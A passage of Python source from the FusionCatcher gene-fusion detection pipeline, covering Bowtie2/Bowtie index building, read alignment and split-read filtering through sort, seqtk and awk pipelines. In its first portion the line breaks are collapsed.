job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input',temp_path=temp_flag if options.skip_bowtie2 and options.skip_spotlight else 'no') job.add('--input_fastq',outdir('original_important.fq.gz'),kind='input',temp_path=temp_flag if options.skip_bowtie2 and options.skip_spotlight else 'no') job.add('--input_fusion_psl',outdir('candidates_fusion_genes_reads_star_last.txt'),kind='input',temp_path=temp_flag) job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') if options.psl_visualization and not empty(datadir('genome.2bit')): job.add('--input_genome_2bit',datadir('genome.2bit'),kind='input') job.add('--psl_alignment_type','web',kind='parameter') if _BT_: job.add('--blat-dir',_BT_,kind='parameter') if options.sam_visualization: job.add('--input_genome_bowtie2',datadir('genome_index2/index'),kind='input') job.add('--sam_alignment','20',kind='parameter') job.add('--threads',options.processes,kind='parameter') if _B2_: job.add('--bowtie2-dir',_B2_,kind='parameter') if options.assembly: job.add('--velvet',kind='parameter') if _VT_: job.add('--velvet-dir',_VT_,kind='parameter') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_STAR.txt'),kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_STAR.zip'),kind='output') job.run() ################################################################################ # Bowtie2 alignment ################################################################################ if (not options.skip_bowtie2) and job.iff(not empty(outdir('reads_gene-gene_no-str.fq')), id = "#reads_gene-gene_no-str.fq-4#"): # find available memory job.add('printf',kind='program') job.add('"\n============\nMEMORY (before using Bowtie2):\n============\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('free',kind='program') job.add('-m',kind='parameter') job.add('>>',info_file,kind='output') job.run() if nucleotides_gg > options.limit_bowtie2: job.add(_FC_+'split-fasta.py',kind='program') job.add('--size',outdir('gene-gene__nuc.txt'),kind='input') job.add('--seqs',outdir('gene-gene__seq.txt'),kind='input') job.add('--threshold',options.limit_bowtie2,kind='parameter') job.add('-i',outdir('gene-gene.fa'),kind='input') job.add('-o',outdir('gene-gene_split_bowtie2.fa'),kind='output') job.add('-x',outdir('gene-gene_split_bowtie2.len'),kind='output') job.run() parts = [el.strip() for el in file(outdir('gene-gene_split_bowtie2.fa'),'r').readlines()] maxlens = [el.strip() for el in 
file(outdir('gene-gene_split_bowtie2.len'),'r').readlines()] for i,part in enumerate(parts): gd = "%s_bowtie2/" % (part,) gdi = "%s_bowtie2/index" % (part,) # build the BOWTIE2 index job.add(_B2_+'bowtie2-build',kind='program') job.add('-f',kind='parameter') job.add('--threads',options.processes,kind='parameter') job.add('--quiet',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','7',kind='parameter') job.add('',part,kind='input') job.add('',gdi,kind='output',checksum='no') job.add('',gd,kind='output',command_line='no') job.run() # align the unmapped reads using BOWTIE2 on candidate fusion gene-gene job.add(_B2_+'bowtie2',kind='program') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33',kind='parameter') job.add('--no-unal',kind='parameter') job.add('--local',kind='parameter') job.add('-N','1',kind='parameter') # new job.add('-R','3',kind='parameter') # new job.add('-D','20',kind='parameter') # new job.add('-k','5',kind='parameter') job.add('-L','20',kind='parameter') job.add('-x',gdi,kind='input',checksum='no') job.add('-x',gd,kind='input',command_line='no',temp_path=temp_flag) job.add('-U',outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('-S',outdir('gene-gene-bowtie2.sam.')+str(i),kind='output') job.add('2>',outdir('log_bowtie2_reads-gene-gene.stdout.txt.')+str(i),kind='output',checksum='no') job.run() job.clean(outdir('log_bowtie2_reads-gene-gene.stdout.txt.')+str(i),temp_path=temp_flag) job.add(_FC_+'sam2psl.py',kind='program') job.add('--input',outdir('gene-gene-bowtie2.sam.')+str(i),kind='input',temp_path=temp_flag) job.add('--output','-',kind='output') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('gene-gene-bowtie2.psl.')+str(i),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('gene-gene-bowtie2.psl.')+str(i),kind='input',temp_path=temp_flag) job.add('--output',outdir('gene-gene-bowtie2_final.psl.')+str(i),kind='output') job.add('--clipped-reads-ids',outdir('reads-ids_clip_psl_bowtie2.txt.')+str(i),kind='output') job.add('--clipped-reads-refs',outdir('reads-refs_clip_psl_bowtie2.txt.')+str(i),kind='output') job.add('--clip-min',length_anchor_bowtie2,kind='parameter') job.run() if job.iff(empty(outdir('reads-ids_clip_psl_bowtie2.txt.')+str(i)),id = "#reads-ids-clip-psl-bowtie2."+str(i)+"#"): job.clean(outdir('reads-ids_clip_psl_bowtie2.txt.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-refs_clip_psl_bowtie2.txt.')+str(i),temp_path=temp_flag) job.clean(part,temp_path=temp_flag) else: job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: 
job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-ids_clip_psl_bowtie2.txt.')+str(i),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-ids_clip_bowtie2_psl_uniq.txt.')+str(i),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f1',outdir('reads-ids_clip_bowtie2_psl_uniq.txt.')+str(i),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('subseq',kind='parameter') job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('-',kind='parameter') job.add('>',outdir('reads-ids_clip_bowtie2_psl.fq.')+str(i),kind='output') job.run() job.add(_FC_+'split-reads.py',kind='program') job.add('--input',outdir('reads-ids_clip_bowtie2_psl.fq.')+str(i),kind='input',temp_path=temp_flag) job.add('--list',outdir('reads-ids_clip_bowtie2_psl_uniq.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('--output-1',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='output') job.add('--output-2',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='output') job.add('--wiggle-size',options.rescue_wiggle_size,kind='parameter') job.add('--gap-size',options.rescue_gap_size,kind='parameter') job.add('--anchor-size',length_anchor_minimum,kind='parameter') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails due to a memory error then lowering the "+ "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ "of FusionCatcher and running it again might help!")) job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-refs_clip_psl_bowtie2.txt.')+str(i),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-refs_clip_bowtie2_psl_uniq.txt.')+str(i),kind='output') job.run() # some pre-filtering of splitting reads (filter out the split reads which map on one gene) job.add('LC_ALL=C',kind='program') 
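# mirror of the STAR branch: split the pipe-delimited reference names and keep the first two fields, one per line, to select only sequences that received clipped alignments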
job.add('cat',kind='parameter') job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq.txt.')+str(i),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"|"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f',"1,2",kind='parameter') job.add('|',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('|',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') # unique job.add('|',kind='parameter') job.add('sed',kind='parameter') job.add("'1{/^$/d}'",kind='parameter') # delete the first line if it is empty (i.e. it contains only a newline) job.add('>',outdir('reads-refs_clip_bowtie2_psl_uniq_more.txt.')+str(i),kind='output') job.run() gdau = "%s_bowtie_bowtie2_unique.fa" % (part,) job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('gene-gene_unique.fa'),kind='input') job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq_more.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('>',gdau,kind='output') job.run() gdbu = "%s_bowtie_bowtie2_unique/" % (part,) job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',outdir('gene-gene.fa'),kind='input') job.add('',gdau,kind='input',temp_path=temp_flag) job.add('',gdbu,kind='output',checksum='no') job.add('',gdbu,kind='output',command_line='no') job.run() # map using bowtie # filter out reads not mapping ms = min(options.mismatches,2) if options.skip_fastqtk: job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='input') else: job.add(_FK_+'fastqtk',kind='program') job.add('interleave',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'sliding-read.py',kind='parameter') job.add('--window','33',kind='parameter') job.add('--step','15',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o','-',kind='parameter') job.add('|',kind='parameter') job.add(_BE_+'bowtie',kind='parameter') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') # job.add('--trim5','10',kind='parameter') # job.add('--trim3','10',kind='parameter') job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') if os.path.isfile(os.path.join(gdbu,'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',gdbu,kind='input') job.add('-',kind='parameter') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2-temp.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter')
job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add('',"""'{n=length($0); if (olde=="a" && substr($0,0,n-1)==old && substr($0,n,1)=="b") {print old"a\\n"$0; old="";} {old=substr($0,0,n-1); olde=substr($0,n,1);}}'""",kind='parameter') job.add('>',outdir('reads_filtered_unique_cuts_bowtie2.txt.')+str(i),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads_filtered_unique_cuts_bowtie2.txt.')+str(i),kind='input') job.add('>',outdir('reads-ids_clip_bowtie2_psl_r1r1.fq.')+str(i),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='input') job.add('',outdir('reads_filtered_unique_cuts_bowtie2.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_bowtie2_psl_r2r2.fq.')+str(i),kind='output') job.run() # this is for the case when the output from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_bowtie2_psl_r1r1.fq.')+str(i)),id = "##reads-ids_clip_bowtie2_psl_r1r1.fq."+str(i)+"##"): job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='input') job.add('>',outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq.')+str(i),kind='output') job.run() job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='input') job.add('>',outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq.')+str(i),kind='output') job.run() job.clean(outdir('reads-ids_clip_bowtie2_psl_r1r1.fq.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_bowtie2_psl_r2r2.fq.')+str(i),temp_path=temp_flag) else: job.link(outdir('reads-ids_clip_bowtie2_psl_r1r1.fq.')+str(i), outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq.')+str(i), temp_path=temp_flag) job.link(outdir('reads-ids_clip_bowtie2_psl_r2r2.fq.')+str(i), outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq.')+str(i), temp_path=temp_flag) # map using bowtie ms = min(options.mismatches,2) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-X',maxlens[i],kind='parameter',from_file="yes") job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--ff',kind='parameter') job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2.fq'),kind='output',command_line='no') # unmapped reads
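# --max below diverts multi-mapping pairs so they do not end up in the --un files; -X maxlens[i] above caps the insert size using the longest sequence recorded for this FASTA part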
        job.add('--max',outdir('reads-ids_clip_bowtie2_psl_max_filtered.fq.')+str(i),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un'
        if os.path.isfile(os.path.join(gdbu,'.1.ebwtl')):
            job.add('--large-index',kind='parameter')
        job.add('',gdbu,kind='input',temp_path=temp_flag)
        job.add('-1',outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq.')+str(i),kind='input',temp_path=temp_flag)
        job.add('-2',outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq.')+str(i),kind='input',temp_path=temp_flag)
        job.add('',outdir('split_gene-gene_bowtie2_filtered.sam.')+str(i),kind='output',temp_path=temp_flag)
        job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag)
        job.run()
        # this is for the case when the output of the previous command is empty (then it takes the first read)
        if job.iff(empty(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1.fq')),id = "##reads-ids_clip_bowtie2_psl_unmapped_filtered-"+str(i)+"_1.fq##"):
            job.add('head',kind='program')
            job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),kind='input',temp_path=temp_flag)
            job.add('>',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1_t.fq'),kind='output')
            job.run()
            job.add('head',kind='program')
            job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),kind='input',temp_path=temp_flag)
            job.add('>',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2_t.fq'),kind='output')
            job.run()
            job.clean(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1.fq'),temp_path=temp_flag)
            job.clean(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2.fq'),temp_path=temp_flag)
        else:
            job.link(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1.fq'), outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1_t.fq'), temp_path=temp_flag)
            job.link(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2.fq'), outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2_t.fq'), temp_path=temp_flag)
            job.clean(outdir('reads-ids_clip_bowtie2_psl_r1.fq.')+str(i),temp_path=temp_flag)
            job.clean(outdir('reads-ids_clip_bowtie2_psl_r2.fq.')+str(i),temp_path=temp_flag)
        gda = "%s_bowtie_bowtie2.fa" % (part,)
        job.add(_SK_+'seqtk',kind='program')
        job.add('subseq',kind='parameter')
        job.add('',part,kind='input',temp_path=temp_flag)
        job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq.txt.')+str(i),kind='input',temp_path=temp_flag)
        job.add('>',gda,kind='output')
        job.run()
        gdb = "%s_bowtie_bowtie2/" % (part,)
        job.add(_BE_+'bowtie-build',kind='program')
        if bowtie121:
            job.add('--threads',options.processes,kind='parameter')
        job.add('-f',kind='parameter')
        job.add('--quiet',kind='parameter')
        # job.add('--ntoa',kind='parameter')
        job.add('--offrate','1',kind='parameter')
        job.add('--ftabchars','5',kind='parameter')
        #job.add('',outdir('gene-gene.fa'),kind='input')
        job.add('',gda,kind='input',temp_path=temp_flag)
        job.add('',gdb,kind='output',checksum='no')
        job.add('',gdb,kind='output',command_line='no')
        job.run()
        # map using bowtie
        job.add(_BE_+'bowtie',kind='program')
        job.add('--seed',bowtie_seed,kind='parameter')
        if bowtie121:
            job.add('--no-unal',kind='parameter')
        job.add('-t',kind='parameter')
        #job.add('-q',kind='parameter')
        #job.add('-a',kind='parameter')
        job.add('-k','500',kind='parameter')
        job.add('-v',options.mismatches,kind='parameter')
        job.add('-p',options.processes,kind='parameter',checksum='no')
        if os.path.isfile(os.path.join(gdb,'.1.ebwtl')):
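            # bowtie marks indexes built over very large (>4 GB) references with
            # the .ebwtl extension instead of .ebwt; such indexes must be opened
            # with '--large-index', hence the file-existence probe above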
            job.add('--large-index',kind='parameter')
        job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no')
        if options.ff_tryhard:
            job.add('--tryhard',kind='parameter')
        job.add('--best',kind='parameter')
        job.add('--strata',kind='parameter')
        job.add('--sam',kind='parameter')
        job.add('--ff',kind='parameter')
        #job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes")
        job.add('-X',maxlens[i],kind='parameter',from_file="yes")
        job.add('',gdb,kind='input',temp_path=temp_flag)
        job.add('-1',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_1_t.fq'),kind='input',temp_path=temp_flag)
        job.add('-2',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered-'+str(i)+'_2_t.fq'),kind='input',temp_path=temp_flag)
        if bowtie121:
            job.add('',outdir('split_gene-gene_bowtie2.sam.')+str(i),kind='output')
            job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag)
        else:
            job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag)
            job.add('|',kind='parameter')
            job.add('LC_ALL=C',kind='parameter')
            job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter')
            job.add('>',outdir('split_gene-gene_bowtie2.sam.')+str(i),kind='output')
        job.run()
        job.add(_FC_+'merge-sam.py',kind='program')
        job.add('--input',outdir('split_gene-gene_bowtie2.sam.')+str(i),kind='input',temp_path=temp_flag)
        job.add('--output',outdir('split_gene-gene_bowtie2_patch.sam.')+str(i),kind='output')
        job.run()
        job.add(_FC_+'sam2psl.py',kind='program')
        job.add('--input',outdir('split_gene-gene_bowtie2_patch.sam.')+str(i),kind='input',temp_path=temp_flag)
        #job.add('--output',outdir('split_gene-gene_bowtie2_patch.psl.')+str(i),kind='output')
        job.add('--output','-',kind='parameter')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('sort',kind='parameter')
        job.add('-k','10,10',kind='parameter')
        job.add('-k','14,14',kind='parameter')
        job.add('-k','12,12n',kind='parameter')
        job.add('-k','13,13n',kind='parameter')
        job.add('-t',"'\t'",kind='parameter')
        if sort_buffer:
            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
        if sort_parallel:
            job.add('--parallel',options.processes,kind='parameter',checksum='no')
        if sort_lzop_compress:
            job.add('--compress-program','lzop',kind='parameter',checksum='no')
        elif sort_gzip_compress:
            job.add('--compress-program','gzip',kind='parameter',checksum='no')
        job.add('-T',tmp_dir,kind='parameter',checksum='no')
        job.add('>',outdir('split_gene-gene_bowtie2_patch.psl.')+str(i),kind='output')
        job.run()
        job.add(_FC_+'analyze_splits_sam.py',kind='program')
        job.add('--input',outdir('split_gene-gene_bowtie2_patch.psl.')+str(i),kind='input',temp_path=temp_flag)
        job.add('--output',outdir('split_gene-gene_bowtie2_final.psl.')+str(i),kind='output')
        job.add('--remove-extra',kind='parameter')
        job.run()
        if job.iff(empty(outdir('split_gene-gene_bowtie2_final.psl.')+str(i)),id = "#split_gene-gene_bowtie2_final."+str(i)+"#"):
            job.link(outdir('gene-gene-bowtie2_final.psl.')+str(i), outdir('gene-gene-bowtie2_final_more.psl.')+str(i), temp_path=temp_flag, dest_list='genegenebowtie2')
            job.clean(outdir('split_gene-gene_bowtie2_final.psl.')+str(i),temp_path=temp_flag)
        else:
            job.add('cat',kind='program')
            job.add('',outdir('split_gene-gene_bowtie2_final.psl.')+str(i),kind='input',temp_path=temp_flag)
            job.add('',outdir('gene-gene-bowtie2_final.psl.')+str(i),kind='input',temp_path=temp_flag)
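            # 'dest_list' accumulates the per-chunk result files on
            # job.genegenebowtie2 so that job.sink() below can collect them into
            # a single list for concatenation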
            job.add('>',outdir('gene-gene-bowtie2_final_more.psl.')+str(i),kind='output',dest_list='genegenebowtie2')
            job.run()
    #job.clean(outdir('gene-gene_split_bowtie2.fa'),temp_path=temp_flag)
    job.clean(outdir('reads_gene-gene_no-str.fq'),temp_path=temp_flag)
    job.sink(job.genegenebowtie2, outdir('gene-gene-bowtie2_final_more.psl.txt'))
    job.add(_FC_+'concatenate.py',kind='program')
    job.add('-f',outdir('gene-gene-bowtie2_final_more.psl.txt'),kind='input',temp_path=temp_flag)
    job.add('',outdir('gene-gene-bowtie2_final_more.psl'),kind='output')
    job.run()
    # for tfile in job.genegenebowtie2:
    #     job.clean(tfile,temp_path=temp_flag)
    job.clean(job.genegenebowtie2,temp_path=temp_flag)
else:
    # build the BOWTIE2 index
    job.add(_B2_+'bowtie2-build',kind='program')
    job.add('-f',kind='parameter')
    job.add('--threads',options.processes,kind='parameter')
    job.add('--quiet',kind='parameter')
    job.add('--offrate','1',kind='parameter')
    job.add('--ftabchars','7',kind='parameter')
    job.add('',outdir('gene-gene.fa'),kind='input')
    job.add('',outdir('gene-gene-bowtie2/index'),kind='output',checksum='no')
    job.add('',outdir('gene-gene-bowtie2/'),kind='output',command_line='no')
    job.run()
    # align the unmapped reads using BOWTIE2 on candidate fusion gene-gene
    job.add(_B2_+'bowtie2',kind='program')
    job.add('-p',options.processes,kind='parameter',checksum='no')
    job.add('--phred33',kind='parameter')
    job.add('--no-unal',kind='parameter')
    job.add('--local',kind='parameter')
    job.add('-N','1',kind='parameter') # new
    job.add('-R','3',kind='parameter') # new
    job.add('-D','20',kind='parameter') # new
    job.add('-k','5',kind='parameter')
    job.add('-L','20',kind='parameter')
    job.add('-x',outdir('gene-gene-bowtie2/index'),kind='input',checksum='no')
    job.add('-x',outdir('gene-gene-bowtie2/'),kind='input',command_line='no',temp_path=temp_flag)
    job.add('-U',outdir('reads_gene-gene_no-str.fq'),kind='input')
    job.add('-S',outdir('gene-gene-bowtie2.sam'),kind='output')
    job.add('2>',outdir('log_bowtie2_reads-gene-gene.stdout.txt'),kind='output',checksum='no')
    job.run()
    # -D 20 -R 3 -N 1 -L 20 => almost like bwa-mem
    # tried -D 20 -R 3 -N 0 -i 'S,1,0.5' but it was slow
    job.clean(outdir('log_bowtie2_reads-gene-gene.stdout.txt'),temp_path=temp_flag)
    job.add(_FC_+'sam2psl.py',kind='program')
    job.add('--input',outdir('gene-gene-bowtie2.sam'),kind='input',temp_path=temp_flag)
    job.add('--output','-',kind='output')
    job.add('|',kind='parameter')
    job.add('LC_ALL=C',kind='parameter')
    job.add('sort',kind='parameter')
    job.add('-k','10,10',kind='parameter')
    job.add('-k','14,14',kind='parameter')
    job.add('-k','12,12n',kind='parameter')
    job.add('-k','13,13n',kind='parameter')
    job.add('-t',"'\t'",kind='parameter')
    if sort_buffer:
        job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
    if sort_parallel:
        job.add('--parallel',options.processes,kind='parameter',checksum='no')
    if sort_lzop_compress:
        job.add('--compress-program','lzop',kind='parameter',checksum='no')
    elif sort_gzip_compress:
        job.add('--compress-program','gzip',kind='parameter',checksum='no')
    job.add('-T',tmp_dir,kind='parameter',checksum='no')
    job.add('>',outdir('gene-gene-bowtie2.psl'),kind='output')
    job.run()
    job.add(_FC_+'analyze_splits_sam.py',kind='program')
    job.add('--input',outdir('gene-gene-bowtie2.psl'),kind='input',temp_path=temp_flag)
    job.add('--output',outdir('gene-gene-bowtie2_final.psl'),kind='output')
    job.add('--clipped-reads-ids',outdir('reads-ids_clip_psl_bowtie2.txt'),kind='output')
    job.add('--clipped-reads-refs',outdir('reads-refs_clip_psl_bowtie2.txt'),kind='output')
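    # reads soft-clipped at the candidate breakpoint are exported here (ids plus
    # the junction references they hit); anything clipped by at least
    # '--clip-min' bases is re-examined by the split-read rescue steps below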
    job.add('--clip-min',length_anchor_bowtie2,kind='parameter')
    job.run()
    if job.iff(empty(outdir('reads-ids_clip_psl_bowtie2.txt')),id = "#reads-ids-clip-psl-bowtie2#"):
        job.clean(outdir('reads-ids_clip_psl_bowtie2.txt'),temp_path=temp_flag)
        job.clean(outdir('reads-refs_clip_psl_bowtie2.txt'),temp_path=temp_flag)
    else:
        job.add('LC_ALL=C',kind='program')
        job.add('sort',kind='parameter')
        job.add('-u',kind='parameter')
        if sort_buffer:
            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
        if sort_parallel:
            job.add('--parallel',options.processes,kind='parameter',checksum='no')
        if sort_lzop_compress:
            job.add('--compress-program','lzop',kind='parameter',checksum='no')
        elif sort_gzip_compress:
            job.add('--compress-program','gzip',kind='parameter',checksum='no')
        job.add('-T',tmp_dir,kind='parameter',checksum='no')
        job.add('',outdir('reads-ids_clip_psl_bowtie2.txt'),kind='input',temp_path=temp_flag)
        # job.add('|',kind='parameter')
        # job.add('LC_ALL=C',kind='parameter')
        # job.add('uniq',kind='parameter')
        job.add('>',outdir('reads-ids_clip_bowtie2_psl_uniq.txt'),kind='output')
        job.run()
        job.add('LC_ALL=C',kind='program')
        job.add('cut',kind='parameter')
        job.add('-f1',outdir('reads-ids_clip_bowtie2_psl_uniq.txt'),kind='input')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('uniq',kind='parameter')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('sort',kind='parameter')
        job.add('-u',kind='parameter')
        if sort_buffer:
            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
        if sort_parallel:
            job.add('--parallel',options.processes,kind='parameter',checksum='no')
        if sort_lzop_compress:
            job.add('--compress-program','lzop',kind='parameter',checksum='no')
        elif sort_gzip_compress:
